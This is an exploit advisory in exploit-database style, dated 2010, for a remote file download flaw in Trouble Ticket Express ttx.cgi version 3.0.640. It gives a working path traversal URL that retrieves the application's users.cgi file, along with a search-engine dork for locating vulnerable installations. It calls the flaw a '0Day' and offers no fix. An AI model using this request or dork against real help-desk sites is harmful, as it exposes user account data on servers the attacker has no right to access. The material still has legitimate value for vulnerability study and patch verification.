Trouble Ticket Software ttx.cgi Remote File Download

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Trouble Ticket Software ttx.cgi Remote File Download
# Published : 2010-03-20
# Author : n01d
# Previous Title : Pay Per Watch & Bid Auktions System BLIND SQL Injection auktion.php (id_auk)
# Next Title : Quality Point 1.0 NewsFeed (SQL/XSS) Multiple Remote Vulnerabilities

# Exploit Title: Trouble Ticket Software 0Day
# Date: 3/12/2010
# Author: n01d
# Software Link: http://www.troubleticketexpress.com
# Version: TTX v3.0.640
# Tested on: <=3.0.640
                 ___   _      _
         _ __   / _  / |  __| |
        | '_  | | | || | / _` |
        | | | || |_| || || (_| |
        |_| |_| ___/ |_| __,_|
        Bob  @  http://n01d.com


Type:    Trouble Ticket Software 0Day

Vendor:  Remote File Download

Exploit: http://www.example.com/TTXdir/ ttx.cgi?cmd=file&fid=../users.cgi&fn=users.cgi

Dork:    "Help desk software by United Web Coders rev. 3.0.640"

Shouts:  Pro, resU, Bob, Jester, Crusader, Wozniak